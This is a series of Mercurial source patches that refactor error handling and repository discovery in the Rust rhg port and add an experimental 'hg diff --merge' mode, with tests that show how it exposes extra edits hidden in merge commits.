let normalized = cwd.join(&file); let stripped = normalized .strip_prefix(&repo.working_directory_path()) - .or(Err(CommandError::Abort(None)))?; + // TODO: error message for path arguments outside of the repo + .map_err(|_| CommandError::abort(""))?; let hg_file = HgPathBuf::try_from(stripped.to_path_buf()) - .or(Err(CommandError::Abort(None)))?; + .map_err(|e| CommandError::abort(e.to_string()))?; files.push(hg_file); } diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -28,8 +28,7 @@ repo: &Repo, files: impl IntoIterator<Item = &'a HgPath>, ) -> Result<(), CommandError> { - let cwd = std::env::current_dir() - .or_else(|e| Err(CommandError::CurrentDirNotFound(e)))?; + let cwd = hg::utils::current_dir()?; let rooted_cwd = cwd .strip_prefix(repo.working_directory_path()) .expect("cwd was already checked within the repository"); diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -1,101 +1,65 @@ -use crate::exitcode; use crate::ui::utf8_to_local; use crate::ui::UiError; -use format_bytes::format_bytes; -use hg::errors::HgError; +use hg::errors::{HgError, IoErrorContext}; use hg::operations::FindRootError; use hg::revlog::revlog::RevlogError; -use hg::utils::files::get_bytes_from_path; use std::convert::From; -use std::path::PathBuf; /// The kind of command error -#[derive(Debug, derive_more::From)] +#[derive(Debug)] pub enum CommandError { - /// The root of the repository cannot be found - RootNotFound(PathBuf), - /// The current directory cannot be found - CurrentDirNotFound(std::io::Error), - /// The standard output stream cannot be written to - StdoutError, - /// The standard error stream cannot be written to - StderrError, - /// The command aborted - Abort(Option<Vec<u8>>), + /// Exit with an error message and "standard" failure exit code. 
+ Abort { message: Vec<u8> }, + /// A mercurial capability has not been implemented. + /// + /// There is no error message printed in this case. + /// Instead, we exit with a specific status code and a wrapper script may + /// fallback to Python-based Mercurial. Unimplemented, - /// Common cases - #[from] - Other(HgError), } impl CommandError { - pub fn get_exit_code(&self) -> exitcode::ExitCode { - match self { - CommandError::RootNotFound(_) => exitcode::ABORT, - CommandError::CurrentDirNotFound(_) => exitcode::ABORT, - CommandError::StdoutError => exitcode::ABORT, - CommandError::StderrError => exitcode::ABORT, - CommandError::Abort(_) => exitcode::ABORT, - CommandError::Unimplemented => exitcode::UNIMPLEMENTED_COMMAND, - CommandError::Other(HgError::UnsupportedFeature(_)) => { - exitcode::UNIMPLEMENTED_COMMAND - } - CommandError::Other(_) => exitcode::ABORT, + pub fn abort(message: impl AsRef<str>) -> Self { + CommandError::Abort { + // TODO: bytes-based (instead of Unicode-based) formatting + // of error messages to handle non-UTF-8 filenames etc: + // https://www.mercurial-scm.org/wiki/EncodingStrategy#Mixing_output + message: utf8_to_local(message.as_ref()).into(), + } } +} - /// Return the message corresponding to the error if any - pub fn get_error_message_bytes(&self) -> Option<Vec<u8>> { - match self { - CommandError::RootNotFound(path) => { - let bytes = get_bytes_from_path(path); - Some(format_bytes!( - b"abort: no repository found in '{}' (.hg not found)!\n", - bytes.as_slice() - )) - } - CommandError::CurrentDirNotFound(e) => Some(format_bytes!( - b"abort: error getting current working directory: {}\n", - e.to_string().as_bytes(), - )), - CommandError::Abort(message) => message.to_owned(), - - CommandError::StdoutError - | CommandError::StderrError - | CommandError::Unimplemented - | CommandError::Other(HgError::UnsupportedFeature(_)) => None, - - CommandError::Other(e) => { - Some(format_bytes!(b"{}\n", e.to_string().as_bytes())) - } +impl From<HgError> 
for CommandError { + fn from(error: HgError) -> Self { + match error { + HgError::UnsupportedFeature(_) => CommandError::Unimplemented, + _ => CommandError::abort(error.to_string()), } } - - /// Exist the process with the corresponding exit code. - pub fn exit(&self) { - std::process::exit(self.get_exit_code()) - } } impl From<UiError> for CommandError { - fn from(error: UiError) -> Self { - match error { - UiError::StdoutError(_) => CommandError::StdoutError, - UiError::StderrError(_) => CommandError::StderrError, - } + fn from(_error: UiError) -> Self { + // If we already failed writing to stdout or stderr, + // writing an error message to stderr about it would be likely to fail + // too. + CommandError::abort("") } } impl From<FindRootError> for CommandError { fn from(err: FindRootError) -> Self { match err { - FindRootError::RootNotFound(path) => { - CommandError::RootNotFound(path) + FindRootError::RootNotFound(path) => CommandError::abort(format!( + "no repository found in '{}' (.hg not found)!", + path.display() + )), + FindRootError::GetCurrentDirError(error) => HgError::IoError { + error, + context: IoErrorContext::CurrentDir, } - FindRootError::GetCurrentDirError(e) => { - CommandError::CurrentDirNotFound(e) - } + .into(), } } } @@ -103,21 +67,15 @@ impl From<(RevlogError, &str)> for CommandError { fn from((err, rev): (RevlogError, &str)) -> CommandError { match err { - RevlogError::InvalidRevision => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: invalid revision identifier {}\n", - rev - )) - .into(), + RevlogError::InvalidRevision => CommandError::abort(format!( + "invalid revision identifier {}", + rev )), - RevlogError::AmbiguousPrefix => CommandError::Abort(Some( - utf8_to_local(&format!( - "abort: ambiguous revision identifier {}\n", - rev - )) - .into(), + RevlogError::AmbiguousPrefix => CommandError::abort(format!( + "ambiguous revision identifier {}", + rev )), - RevlogError::Other(err) => CommandError::Other(err), + 
RevlogError::Other(error) => error.into(), } } } diff --git a/rust/rhg/src/exitcode.rs b/rust/rhg/src/exitcode.rs --- a/rust/rhg/src/exitcode.rs +++ b/rust/rhg/src/exitcode.rs @@ -6,5 +6,5 @@ /// Generic abort pub const ABORT: ExitCode = 255; -/// Command not implemented by rhg -pub const UNIMPLEMENTED_COMMAND: ExitCode = 252; +/// Command or feature not implemented by rhg +pub const UNIMPLEMENTED: ExitCode = 252; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -5,6 +5,7 @@ use clap::ArgGroup; use clap::ArgMatches; use clap::SubCommand; +use format_bytes::format_bytes; use hg::operations::DebugDataKind; use std::convert::TryFrom; @@ -91,26 +92,31 @@ let matches = app.clone().get_matches_safe().unwrap_or_else(|err| { let _ = ui::Ui::new().writeln_stderr_str(&err.message); - std::process::exit(exitcode::UNIMPLEMENTED_COMMAND) + std::process::exit(exitcode::UNIMPLEMENTED) }); let ui = ui::Ui::new(); let command_result = match_subcommand(matches, &ui); - match command_result { - Ok(_) => std::process::exit(exitcode::OK), - Err(e) => { - let message = e.get_error_message_bytes(); - if let Some(msg) = message { - match ui.write_stderr(&msg) { - Ok(_) => (), - Err(_) => std::process::exit(exitcode::ABORT), - }; - }; - e.exit() + let exit_code = match command_result { + Ok(_) => exitcode::OK, + + // Exit with a specific code and no error message to let a potential + // wrapper script fallback to Python-based Mercurial. + Err(CommandError::Unimplemented) => exitcode::UNIMPLEMENTED, + + Err(CommandError::Abort { message }) => { + if !message.is_empty() { + // Ignore errors when writing to stderr, we’re already exiting + // with failure code so there’s not much more we can do. 
+ let _ = + ui.write_stderr(&format_bytes!(b"abort: {}\n", message)); + } + exitcode::ABORT } - } + }; + std::process::exit(exit_code) } fn match_subcommand( diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -38,7 +38,7 @@ Deleted repository $ rm -rf `pwd` $ rhg root - abort: error getting current working directory: $ENOENT$ + abort: $ENOENT$: current directory [255] Listing tracked files @@ -163,7 +163,7 @@ $ echo -e '\xFF' >> .hg/requires $ rhg debugrequirements - corrupted repository: parse error in 'requires' file + abort: corrupted repository: parse error in 'requires' file [255] Persistent nodemap # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1611862302 -3600 # Thu Jan 28 20:31:42 2021 +0100 # Node ID 1dcd9c9975eda56a0339c44e3c87f3a02213f7db # Parent ca3f73cc3cf4269ae519878628cba51a70065fa5 rust: Fold find_root and check_requirements into Repo::find Differential Revision: https://phab.mercurial-scm.org/D9906 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -11,7 +11,7 @@ use crate::config::layer::{ConfigError, ConfigLayer, ConfigValue}; use std::path::PathBuf; -use crate::operations::find_root; +use crate::repo::Repo; use crate::utils::files::read_whole_file; /// Holds the config values for the current repository @@ -76,10 +76,9 @@ /// Loads the local config. In a future version, this will also load the /// `$HOME/.hgrc` and more to mirror the Python implementation. - pub fn load() -> Result<Self, ConfigError> { - let root = find_root().unwrap(); + pub fn load_for_repo(repo: &Repo) -> Result<Self, ConfigError> { Ok(Self::load_from_explicit_sources(vec![ - ConfigSource::AbsPath(root.join(".hg/hgrc")), + ConfigSource::AbsPath(repo.hg_vfs().join("hgrc")), ])?) 
} diff --git a/rust/hg-core/src/operations/find_root.rs b/rust/hg-core/src/operations/find_root.rs deleted file mode 100644 --- a/rust/hg-core/src/operations/find_root.rs +++ /dev/null @@ -1,79 +0,0 @@ -use std::path::{Path, PathBuf}; - -/// Error type for `find_root` -#[derive(Debug)] -pub enum FindRootError { - /// Root of the repository has not been found - /// Contains the current directory used by FindRoot - RootNotFound(PathBuf), - /// The current directory does not exists or permissions are insufficient - /// to get access to it - GetCurrentDirError(std::io::Error), -} - -/// Find the root of the repository -/// by searching for a .hg directory in the process’ current directory and its -/// ancestors -pub fn find_root() -> Result<PathBuf, FindRootError> { - let current_dir = std::env::current_dir() - .map_err(|e| FindRootError::GetCurrentDirError(e))?; - Ok(find_root_from_path(¤t_dir)?.into()) -} - -/// Find the root of the repository -/// by searching for a .hg directory in the given directory and its ancestors -pub fn find_root_from_path(start: &Path) -> Result<&Path, FindRootError> { - if start.join(".hg").exists() { - return Ok(start); - } - for ancestor in start.ancestors() { - if ancestor.join(".hg").exists() { - return Ok(ancestor); - } - } - Err(FindRootError::RootNotFound(start.into())) -} - -#[cfg(test)] -mod tests { - use super::*; - use std::fs; - use tempfile; - - #[test] - fn dot_hg_not_found() { - let tmp_dir = tempfile::tempdir().unwrap(); - let path = tmp_dir.path(); - - let err = find_root_from_path(&path).unwrap_err(); - - // TODO do something better - assert!(match err { - FindRootError::RootNotFound(p) => p == path.to_path_buf(), - _ => false, - }) - } - - #[test] - fn dot_hg_in_current_path() { - let tmp_dir = tempfile::tempdir().unwrap(); - let root = tmp_dir.path(); - fs::create_dir_all(root.join(".hg")).unwrap(); - - let result = find_root_from_path(&root).unwrap(); - - assert_eq!(result, root) - } - - #[test] - fn dot_hg_in_parent() 
{ - let tmp_dir = tempfile::tempdir().unwrap(); - let root = tmp_dir.path(); - fs::create_dir_all(root.join(".hg")).unwrap(); - - let directory = root.join("some/nested/directory"); - let result = find_root_from_path(&directory).unwrap(); - - assert_eq!(result, root) - } -} /* tests */ diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -5,10 +5,8 @@ mod cat; mod debugdata; mod dirstate_status; -mod find_root; mod list_tracked_files; pub use cat::cat; pub use debugdata::{debug_data, DebugDataKind}; -pub use find_root::{find_root, find_root_from_path, FindRootError}; pub use list_tracked_files::Dirstate; pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; diff --git a/rust/hg-core/src/repo.rs b/rust/hg-core/src/repo.rs --- a/rust/hg-core/src/repo.rs +++ b/rust/hg-core/src/repo.rs @@ -1,5 +1,4 @@ use crate::errors::{HgError, IoResultExt}; -use crate::operations::{find_root, FindRootError}; use crate::requirements; use memmap::{Mmap, MmapOptions}; use std::path::{Path, PathBuf}; @@ -11,6 +10,15 @@ store: PathBuf, } +#[derive(Debug, derive_more::From)] +pub enum RepoFindError { + NotFoundInCurrentDirectoryOrAncestors { + current_directory: PathBuf, + }, + #[from] + Other(HgError), +} + /// Filesystem access abstraction for the contents of a given "base" diretory #[derive(Clone, Copy)] pub(crate) struct Vfs<'a> { @@ -18,24 +26,26 @@ } impl Repo { - /// Returns `None` if the given path doesn’t look like a repository - /// (doesn’t contain a `.hg` sub-directory). - pub fn for_path(root: impl Into<PathBuf>) -> Self { - let working_directory = root.into(); - let dot_hg = working_directory.join(".hg"); - Self { - store: dot_hg.join("store"), - dot_hg, - working_directory, + /// Search the current directory and its ancestors for a repository: + /// a working directory that contains a `.hg` sub-directory. 
+ pub fn find() -> Result<Self, RepoFindError> { + let current_directory = crate::utils::current_dir()?; + // ancestors() is inclusive: it first yields `current_directory` as-is. + for ancestor in current_directory.ancestors() { + let dot_hg = ancestor.join(".hg"); + if dot_hg.is_dir() { + let repo = Self { + store: dot_hg.join("store"), + dot_hg, + working_directory: ancestor.to_owned(), + }; + requirements::check(&repo)?; + return Ok(repo); + } } - } - - pub fn find() -> Result<Self, FindRootError> { - find_root().map(Self::for_path) - } - - pub fn check_requirements(&self) -> Result<(), HgError> { - requirements::check(self) + Err(RepoFindError::NotFoundInCurrentDirectoryOrAncestors { + current_directory, + }) } pub fn working_directory_path(&self) -> &Path { @@ -65,11 +75,15 @@ } impl Vfs<'_> { + pub(crate) fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf { + self.base.join(relative_path) + } + pub(crate) fn read( &self, relative_path: impl AsRef<Path>, ) -> Result<Vec<u8>, HgError> { - let path = self.base.join(relative_path); + let path = self.join(relative_path); std::fs::read(&path).for_file(&path) } diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -31,7 +31,6 @@ #[timed] fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; - repo.check_requirements()?; let cwd = hg::utils::current_dir()?; let mut files = vec![]; diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -48,7 +48,6 @@ impl<'a> Command for FilesCommand<'a> { fn run(&self, ui: &Ui) -> Result<(), CommandError> { let repo = Repo::find()?; - repo.check_requirements()?; if let Some(rev) = self.rev { let files = list_rev_tracked_files(&repo, rev).map_err(|e| (e, rev))?; diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ 
b/rust/rhg/src/error.rs @@ -1,8 +1,10 @@ use crate::ui::utf8_to_local; use crate::ui::UiError; -use hg::errors::{HgError, IoErrorContext}; -use hg::operations::FindRootError; +use format_bytes::format_bytes; +use hg::errors::HgError; +use hg::repo::RepoFindError; use hg::revlog::revlog::RevlogError; +use hg::utils::files::get_bytes_from_path; use std::convert::From; /// The kind of command error @@ -48,18 +50,18 @@ } } -impl From<FindRootError> for CommandError { - fn from(err: FindRootError) -> Self { - match err { - FindRootError::RootNotFound(path) => CommandError::abort(format!( - "no repository found in '{}' (.hg not found)!", - path.display() - )), - FindRootError::GetCurrentDirError(error) => HgError::IoError { - error, - context: IoErrorContext::CurrentDir, - } - .into(), +impl From<RepoFindError> for CommandError { + fn from(error: RepoFindError) -> Self { + match error { + RepoFindError::NotFoundInCurrentDirectoryOrAncestors { + current_directory, + } => CommandError::Abort { + message: format_bytes!( + b"no repository found in '{}' (.hg not found)!", + get_bytes_from_path(current_directory) + ), + }, + RepoFindError::Other(error) => error.into(), } } } diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -153,13 +153,7 @@ [252] $ rhg debugrequirements - dotencode - fncache - generaldelta - revlogv1 - sparserevlog - store - indoor-pool + [252] $ echo -e '\xFF' >> .hg/requires $ rhg debugrequirements # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1612180531 -3600 # Mon Feb 01 12:55:31 2021 +0100 # Node ID 0cb1b02228a65048ca872ab5d10d511bae71b12c # Parent 1dcd9c9975eda56a0339c44e3c87f3a02213f7db rust: use HgError in ConfigError Differential Revision: https://phab.mercurial-scm.org/D9938 diff --git a/rust/hg-core/src/config/config.rs b/rust/hg-core/src/config/config.rs --- a/rust/hg-core/src/config/config.rs +++ b/rust/hg-core/src/config/config.rs @@ -8,7 +8,9 @@ // GNU General Public 
License version 2 or any later version. use super::layer; -use crate::config::layer::{ConfigError, ConfigLayer, ConfigValue}; +use crate::config::layer::{ + ConfigError, ConfigLayer, ConfigParseError, ConfigValue, +}; use std::path::PathBuf; use crate::repo::Repo; @@ -89,11 +91,11 @@ &self, section: &[u8], item: &[u8], - ) -> Result<Option<bool>, ConfigError> { + ) -> Result<Option<bool>, ConfigParseError> { match self.get_inner(§ion, &item) { Some((layer, v)) => match parse_bool(&v.bytes) { Some(b) => Ok(Some(b)), - None => Err(ConfigError::Parse { + None => Err(ConfigParseError { origin: layer.origin.to_owned(), line: v.line, bytes: v.bytes.to_owned(), diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -7,6 +7,7 @@ // This software may be used and distributed according to the terms of the // GNU General Public License version 2 or any later version. +use crate::errors::{HgError, IoResultExt}; use crate::utils::files::{ get_bytes_from_path, get_path_from_bytes, read_whole_file, }; @@ -99,20 +100,12 @@ if let Some(m) = INCLUDE_RE.captures(&bytes) { let filename_bytes = &m[1]; let filename_to_include = get_path_from_bytes(&filename_bytes); - match read_include(&src, &filename_to_include) { - (include_src, Ok(data)) => { - layers.push(current_layer); - layers.extend(Self::parse(&include_src, &data)?); - current_layer = - Self::new(ConfigOrigin::File(src.to_owned())); - } - (_, Err(e)) => { - return Err(ConfigError::IncludeError { - path: filename_to_include.to_owned(), - io_error: e, - }) - } - } + let (include_src, result) = + read_include(&src, &filename_to_include); + let data = result.for_file(filename_to_include)?; + layers.push(current_layer); + layers.extend(Self::parse(&include_src, &data)?); + current_layer = Self::new(ConfigOrigin::File(src.to_owned())); } else if let Some(_) = EMPTY_RE.captures(&bytes) { } else if let Some(m) = 
SECTION_RE.captures(&bytes) { section = m[1].to_vec(); @@ -145,11 +138,12 @@ map.remove(&m[1]); } } else { - return Err(ConfigError::Parse { + return Err(ConfigParseError { origin: ConfigOrigin::File(src.to_owned()), line: Some(index + 1), bytes: bytes.to_owned(), - }); + } + .into()); } } if !current_layer.is_empty() { @@ -226,21 +220,17 @@ } } +#[derive(Debug)] +pub struct ConfigParseError { + pub origin: ConfigOrigin, + pub line: Option<usize>, + pub bytes: Vec<u8>, +} + #[derive(Debug, derive_more::From)] pub enum ConfigError { - Parse { - origin: ConfigOrigin, - line: Option<usize>, - bytes: Vec<u8>, - }, - /// Failed to include a sub config file - IncludeError { - path: PathBuf, - io_error: std::io::Error, - }, - /// Any IO error that isn't expected - #[from] - IO(std::io::Error), + Parse(ConfigParseError), + Other(HgError), } fn make_regex(pattern: &'static str) -> Regex { # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1588884626 14400 # Thu May 07 16:50:26 2020 -0400 # Node ID 1a7d12c82057a856458301b4a757055764fb20fc # Parent 0cb1b02228a65048ca872ab5d10d511bae71b12c diff: add experimental support for "merge diffs" The way this works is it re-runs the merge and "stores" conflicts, and then diffs against the conflicted result. In a normal merge, you should only see diffs against conflicted regions or in cases where there was a semantic conflict but not a textual one. This makes it easier to detect "evil merges" that contain substantial new work embedded in the merge commit. 
Differential Revision: https://phab.mercurial-scm.org/D8504 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -29,6 +29,7 @@ bundlecaches, changegroup, cmdutil, + context as contextmod, copies, debugcommands as debugcommandsmod, destutil, @@ -2464,6 +2465,16 @@ (b'', b'from', b'', _(b'revision to diff from'), _(b'REV1')), (b'', b'to', b'', _(b'revision to diff to'), _(b'REV2')), (b'c', b'change', b'', _(b'change made by revision'), _(b'REV')), + ( + b'', + b'merge', + False, + _( + b'show difference between auto-merge and committed ' + b'merge for merge commits (EXPERIMENTAL)' + ), + _(b'REV'), + ), ] + diffopts + diffopts2 @@ -2544,13 +2555,31 @@ to_rev = opts.get(b'to') stat = opts.get(b'stat') reverse = opts.get(b'reverse') + diffmerge = opts.get(b'merge') cmdutil.check_incompatible_arguments(opts, b'from', [b'rev', b'change']) cmdutil.check_incompatible_arguments(opts, b'to', [b'rev', b'change']) if change: repo = scmutil.unhidehashlikerevs(repo, [change], b'nowarn') ctx2 = scmutil.revsingle(repo, change, None) - ctx1 = ctx2.p1() + if diffmerge and ctx2.p2().node() != nullid: + pctx1 = ctx2.p1() + pctx2 = ctx2.p2() + wctx = contextmod.overlayworkingctx(repo) + wctx.setbase(pctx1) + with ui.configoverride( + { + ( + b'ui', + b'forcemerge', + ): b'internal:merge3-lie-about-conflicts', + }, + b'diff --merge', + ): + mergemod.merge(pctx2, wc=wctx) + ctx1 = wctx + else: + ctx1 = ctx2.p1() elif from_rev or to_rev: repo = scmutil.unhidehashlikerevs( repo, [from_rev] + [to_rev], b'nowarn' diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -336,7 +336,7 @@ debugwhyunstable: debugwireargs: three, four, five, ssh, remotecmd, insecure debugwireproto: localssh, peer, noreadstderr, nologhandshake, ssh, remotecmd, insecure - diff: rev, from, to, change, text, git, binary, nodates, noprefix, show-function, reverse, ignore-all-space, 
ignore-space-change, ignore-blank-lines, ignore-space-at-eol, unified, stat, root, include, exclude, subrepos + diff: rev, from, to, change, merge, text, git, binary, nodates, noprefix, show-function, reverse, ignore-all-space, ignore-space-change, ignore-blank-lines, ignore-space-at-eol, unified, stat, root, include, exclude, subrepos export: bookmark, output, switch-parent, rev, text, git, binary, nodates, template files: rev, print0, include, exclude, template, subrepos forget: interactive, include, exclude, dry-run diff --git a/tests/test-diff-change.t b/tests/test-diff-change.t --- a/tests/test-diff-change.t +++ b/tests/test-diff-change.t @@ -194,4 +194,108 @@ 9 10 +merge diff should show only manual edits to a merge: + + $ hg diff --merge -c 6 + merging file.txt +(no diff output is expected here) + +Construct an "evil merge" that does something other than just the merge. + + $ hg co ".^" + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge -r 5 + merging file.txt + 0 files updated, 1 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo 11 >> file.txt + $ hg ci -m 'merge 8 to y with manual edit of 11' # 7 + created new head + $ hg diff -c 7 + diff -r 273b50f17c6d -r 8ad85e839ba7 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -6,6 +6,7 @@ + 5 + 6 + 7 + -8 + +y + 9 + 10 + +11 +Contrast with the `hg diff -c 7` version above: only the manual edit shows +up, making it easy to identify changes someone is otherwise trying to sneak +into a merge. + $ hg diff --merge -c 7 + merging file.txt + diff -r 8ad85e839ba7 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -9,3 +9,4 @@ + y + 9 + 10 + +11 + +Set up a conflict. 
+ $ hg co ".^" + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ sed -e 's,^8$,z,' file.txt > file.txt.tmp + $ mv file.txt.tmp file.txt + $ hg ci -m 'conflicting edit: 8 to z' + created new head + $ echo "this file is new in p1 of the merge" > new-file-p1.txt + $ hg ci -Am 'new file' new-file-p1.txt + $ hg log -r . --template 'p1 will be rev {rev}\n' + p1 will be rev 9 + $ hg co 5 + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ echo "this file is new in p2 of the merge" > new-file-p2.txt + $ hg ci -Am 'new file' new-file-p2.txt + created new head + $ hg log -r . --template 'p2 will be rev {rev}\n' + p2 will be rev 10 + $ hg co -- 9 + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge -r 10 + merging file.txt + warning: conflicts while merging file.txt! (edit, then use 'hg resolve --mark') + 1 files updated, 0 files merged, 0 files removed, 1 files unresolved + use 'hg resolve' to retry unresolved file merges or 'hg merge --abort' to abandon + [1] + $ hg revert file.txt -r . + $ hg resolve -ma + (no more unresolved files) + $ hg commit -m 'merge conflicted edit' +Without --merge, it's a diff against p1 + $ hg diff --no-merge -c 11 + diff -r fd1f17c90d7c -r 5010caab09f6 new-file-p2.txt + --- /dev/null Thu Jan 01 00:00:00 1970 +0000 + +++ b/new-file-p2.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -0,0 +1,1 @@ + +this file is new in p2 of the merge +With --merge, it's a diff against the conflicted content. + $ hg diff --merge -c 11 + merging file.txt + diff -r 5010caab09f6 file.txt + --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 + +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 + @@ -6,12 +6,6 @@ + 5 + 6 + 7 + -<<<<<<< local: fd1f17c90d7c - test: new file + z + -||||||| base + -8 + -======= + -y + ->>>>>>> other: d9e7de69eac3 - test: new file + 9 + 10 + +There must _NOT_ be a .hg/merge directory leftover. + $ test ! -d .hg/merge +(No output is expected) $ cd .. 
# HG changeset patch # User Augie Fackler <augie@google.com> # Date 1612198638 18000 # Mon Feb 01 11:57:18 2021 -0500 # Node ID 62a0b5daa15f10ad30d9dc30b6984b009308ec53 # Parent 1a7d12c82057a856458301b4a757055764fb20fc diff: suppress `merging foo` output lines when performing a merge diff Differential Revision: https://phab.mercurial-scm.org/D9939 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -2576,7 +2576,9 @@ }, b'diff --merge', ): + repo.ui.pushbuffer() mergemod.merge(pctx2, wc=wctx) + repo.ui.popbuffer() ctx1 = wctx else: ctx1 = ctx2.p1() diff --git a/tests/test-diff-change.t b/tests/test-diff-change.t --- a/tests/test-diff-change.t +++ b/tests/test-diff-change.t @@ -197,7 +197,6 @@ merge diff should show only manual edits to a merge: $ hg diff --merge -c 6 - merging file.txt (no diff output is expected here) Construct an "evil merge" that does something other than just the merge. @@ -228,7 +227,6 @@ up, making it easy to identify changes someone is otherwise trying to sneak into a merge. $ hg diff --merge -c 7 - merging file.txt diff -r 8ad85e839ba7 file.txt --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 @@ -277,7 +275,6 @@ +this file is new in p2 of the merge With --merge, it's a diff against the conflicted content. 
$ hg diff --merge -c 11 - merging file.txt diff -r 5010caab09f6 file.txt --- a/file.txt Thu Jan 01 00:00:00 1970 +0000 +++ b/file.txt Thu Jan 01 00:00:00 1970 +0000 # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1612212953 28800 # Mon Feb 01 12:55:53 2021 -0800 # Node ID 1c66795862cf76e985e7d187df2f5b04fc8c25fb # Parent 62a0b5daa15f10ad30d9dc30b6984b009308ec53 # Parent 0e2e7300f4302b02412b0b734717697049494c4c branching: merge with stable diff --git a/contrib/packaging/inno/readme.rst b/contrib/packaging/inno/readme.rst --- a/contrib/packaging/inno/readme.rst +++ b/contrib/packaging/inno/readme.rst @@ -34,7 +34,7 @@ Next, invoke ``packaging.py`` to produce an Inno installer. You will need to supply the path to the Python interpreter to use.:: - $ python3.exe contrib\packaging\packaging.py \ + $ py -3 contrib\packaging\packaging.py \ inno --python c:\python27\python.exe .. note:: diff --git a/contrib/packaging/wix/mercurial.wxs b/contrib/packaging/wix/mercurial.wxs --- a/contrib/packaging/wix/mercurial.wxs +++ b/contrib/packaging/wix/mercurial.wxs @@ -39,7 +39,8 @@ <Property Id="INSTALLDIR"> <ComponentSearch Id='SearchForMainExecutableComponent' - Guid='$(var.ComponentMainExecutableGUID)' /> + Guid='$(var.ComponentMainExecutableGUID)' + Type='directory' /> </Property> <!--Property Id='ARPCOMMENTS'>any comments</Property--> diff --git a/contrib/packaging/wix/readme.rst b/contrib/packaging/wix/readme.rst --- a/contrib/packaging/wix/readme.rst +++ b/contrib/packaging/wix/readme.rst @@ -40,7 +40,7 @@ Next, invoke ``packaging.py`` to produce an MSI installer. You will need to supply the path to the Python interpreter to use.:: - $ python3 contrib\packaging\packaging.py \ + $ py -3 contrib\packaging\packaging.py \ wix --python c:\python27\python.exe .. 
note:: diff --git a/relnotes/next b/relnotes/5.7 copy from relnotes/next copy to relnotes/5.7 --- a/relnotes/next +++ b/relnotes/5.7 @@ -39,7 +39,11 @@ is also supported by "premerge" as `merge-tools.<tool>.premerge=keep-mergediff`. - * External hooks are now called with `HGPLAIN=1` preset. + * External hooks are now called with `HGPLAIN=1` preset. This has the side + effect of ignoring aliases, templates, revsetaliases, and a few other config + options in any `hg` command spawned by the hook. The previous behavior + can be restored by setting HGPLAINEXCEPT appropriately in the parent process. + See `hg help environment` for the list of items, and how to set it. * The `branchmap` cache is updated more intelligently and can be significantly faster for repositories with many branches and changesets. diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -1,60 +1,13 @@ == New Features == - - * There is a new config section for templates used by hg commands. It - is called `[command-templates]`. Some existing config options have - been deprecated in favor of config options in the new - section. These are: `ui.logtemplate` to `command-templates.log`, - `ui.graphnodetemplate` to `command-templates.graphnode`, - `ui.mergemarkertemplate` to `command-templates.mergemarker`, - `ui.pre-merge-tool-output-template` to - `command-templates.pre-merge-tool-output`. - - * There is a new set of config options for the template used for the - one-line commit summary displayed by various commands, such as `hg - rebase`. The main one is `command-templates.oneline-summary`. That - can be overridden per command with - `command-templates.oneline-summary.<command>`, where `<command>` - can be e.g. `rebase`. As part of this effort, the default format - from `hg rebase` was reorganized a bit. - + * `hg purge` is now a core command using `--confirm` by default. - - * `hg strip`, from the strip extension, is now a core command, `hg - debugstrip`. 
